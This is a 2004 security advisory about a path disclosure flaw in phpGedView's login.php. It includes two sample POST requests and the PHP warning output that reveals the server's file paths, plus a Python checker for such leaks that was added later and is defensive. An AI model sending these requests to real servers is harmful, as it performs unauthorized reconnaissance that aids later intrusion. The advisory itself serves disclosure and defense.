[UNIX] PhpGedView Path Disclosure Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 01/26/04

    To: list@securiteam.com
    Date: 26 Jan 2004 13:13:36 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      PhpGedView Path Disclosure Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    phpGedView (http://phpGedView.sourceforge.net) is an open source system
    for online viewing of Gedcom information (family tree and genealogy
    information).
    A security problem in the product allows attackers to learn the true path
    of the server-side script.

    DETAILS

    Vulnerable Systems:
     * phpGedView version 2.65 and prior

    The login.php script does not check whether a variable that is supposed
    to be POSTed has been defined before using it.

    Example:

    I - Path disclosure

    -- HTTP Client Request --

    http://target/phpGedView/login.php POST DATA: action=login

    -- HTTP Client Request --

    Username and password are missing, which generates a PHP error message
    displaying the real path.

    -- HTTP Server Reply --

    <br /> <b>Warning</b>: Undefined index: username in
    <b>/var/www/phpGedView/login.php</b> on line <b>36</b><br /> <br />
    <b>Warning</b>: Undefined index: password in
    <b>/var/www/phpGedView/login.php</b> on line <b>36</b><br /> <br />
    <b>Warning</b>: Cannot add header information - headers already sent by
    (output started at /var/www/phpGedView/login.php:36) in
    <b>/var/www/phpGedView/functions_print.php</b> on line <b>492</b><br />

    -- HTTP Server Reply --

                      -------------------------------------------

    II - Path disclosure with a valid user account

    -- HTTP Client Request --

    http://target/phpGedView/login.php POST DATA:
    action=login&url=editconfig.php&usertime=&username=admin&password=login

    -- HTTP Client Request --

    The username/password must be a valid pair. The usertime value is
    missing, which generates a PHP error message displaying the real path.

    -- HTTP Server Reply --

    <br /> <b>Warning</b>: strtotime() called with empty time parameter in
    <b>/var/www/phpGedView/login.php</b> on line <b>39</b><br /> <br />
    <b>Warning</b>: Cannot add header information - headers already sent by
    (output started at /var/www/phpGedView/login.php:39) in
    <b>/var/www/phpGedView/login.php</b> on line <b>44</b><br />

    -- HTTP Server Reply --
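
As an added example (not part of the original advisory or of phpGedView), the following Python code checks an HTTP response body for PHP error messages of the kind shown in the replies above and reports the server-side paths they leak. The function names are hypothetical, the sample is constructed from the first reply, and matching the plain-text (non-HTML) error form goes beyond what the advisory shows.

```python
import html
import posixpath
import re

# Constructed sample: the first server reply quoted in the advisory.
SAMPLE_REPLY = (
    "<br /> <b>Warning</b>: Undefined index: username in "
    "<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br /> <br /> "
    "<b>Warning</b>: Undefined index: password in "
    "<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br /> <br /> "
    "<b>Warning</b>: Cannot add header information - headers already sent by "
    "(output started at /var/www/phpGedView/login.php:36) in "
    "<b>/var/www/phpGedView/functions_print.php</b> on line <b>492</b><br />"
)

# PHP error layout: Level: message in FILE on line N (the <b> tags are optional,
# so the plain-text form is matched too). Only absolute POSIX paths are matched.
PHP_ERROR = re.compile(
    r"(?:<b>)?(?P<level>Warning|Notice|Fatal error|Parse error)(?:</b>)?:\s*"
    r"(?P<message>[^<]*?)\s+in\s+(?:<b>)?(?P<file>/[^<\s]+)(?:</b>)?"
    r"\s+on\s+line\s+(?:<b>)?(?P<line>\d+)",
    re.IGNORECASE,
)
# A path can also sit inside the message: "(output started at /path/file.php:36)".
EMBEDDED_PATH = re.compile(r"output started at\s+(?P<file>/[^\s:<]+):\d+")


def find_path_disclosures(body):
    """Return one finding per PHP error message that names a server-side file."""
    return [
        {"level": m["level"],
         "message": " ".join(html.unescape(m["message"]).split()),
         "file": m["file"], "line": int(m["line"])}
        for m in PHP_ERROR.finditer(body)
    ]


def disclosed_directories(body):
    """Unique directories leaked via the file field or an embedded path."""
    files = {f["file"] for f in find_path_disclosures(body)}
    files |= {m["file"] for m in EMBEDDED_PATH.finditer(body)}
    return sorted({posixpath.dirname(p) for p in files})


if __name__ == "__main__":
    for finding in find_path_disclosures(SAMPLE_REPLY):
        print(finding)
    print("leaked directories:", disclosed_directories(SAMPLE_REPLY))
```

An empty result from `find_path_disclosures` on the login responses of a test deployment indicates that these warnings no longer reach the client.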

    Vendor Status:
    The vendor has been notified and a release version 2.65.2 with fixes for
    all the above mentioned vulnerabilities will be available soon.

    ADDITIONAL INFORMATION

    The information has been provided by Cedric Cochin
    <cco@netvigilance.com>.
